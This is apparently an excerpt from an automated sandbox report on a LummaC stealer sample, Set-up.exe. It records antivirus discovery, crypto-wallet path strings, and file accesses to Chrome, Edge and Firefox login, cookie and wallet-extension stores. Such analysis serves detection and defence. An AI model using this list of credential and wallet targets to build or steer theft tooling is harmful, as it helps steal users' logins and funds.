              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeQueries volume information: C:\Users\user\AppData\Local\Temp\757b4941 VolumeInformation
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0040B820 GetSystemTime,SystemTimeToFileTime,0_2_0040B820
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046D354 EntryPoint,GetVersion,GetCommandLineA,0_2_0046D354
              Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Set-up.exe, 00000000.00000003.2195047189.000000000077A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s%\Windows Defender\MsMpeng.exe
              Source: Set-up.exe, 00000000.00000003.2195047189.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2184587220.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215607155.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2184622292.0000000000779000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: find.exe, 0000001B.00000002.2738962581.000002ABDD7DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 2164, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ets/Electrum-LTC
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: llets/ElectronCash
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: Set-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletkh<
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletkh<
              Source: Set-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Set-up.exe, 00000000.00000003.2215482777.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
